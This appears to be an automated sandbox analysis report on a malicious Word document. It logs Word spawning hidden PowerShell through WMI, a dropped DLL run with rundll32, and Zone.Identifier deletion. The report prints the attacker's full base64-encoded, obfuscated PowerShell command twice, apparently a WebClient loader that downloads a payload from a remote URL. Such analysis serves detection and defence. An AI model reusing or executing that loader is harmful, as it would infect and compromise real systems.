Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAK
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAK			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10013BFB LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,

7_2_10013BFB

Source: Yvtlx6p4.dll.5.dr

Static PE information: real checksum: 0x4a297 should be: 0x40b13

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000B0BD push ecx; ret	7_2_1000B0D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10007BCA push ecx; ret	7_2_10007BDD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001BCE92 push cs; retf	8_2_001BCE94
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006ACE92 push cs; retf	11_2_006ACE94
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001ECE92 push cs; retf	13_2_001ECE94
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0068CE92 push cs; retf	15_2_0068CE94

Persistence and Installation Behavior:

Creates processes via WMI

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\rundll32.exe

PE file moved: C:\Windows\SysWOW64\Lkvi\ejqhpm.twa

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Lkvi\ejqhpm.twa:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Yffe\xmxs.xtt:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Yxkq\vxcyp.vst:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Glql\mritqo.dtl:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Xlll\midsk.ptl:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Qpvq\ojxkj.pqe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Qfbx\wpmmbwy.jek:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Ljbn\kwuw.ehe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Ghjb\hjdxzl.ejj:Zone.Identifier read attributes \| delete
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Doth\isebmn.lpx:Zone.Identifier read attributes \| delete

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
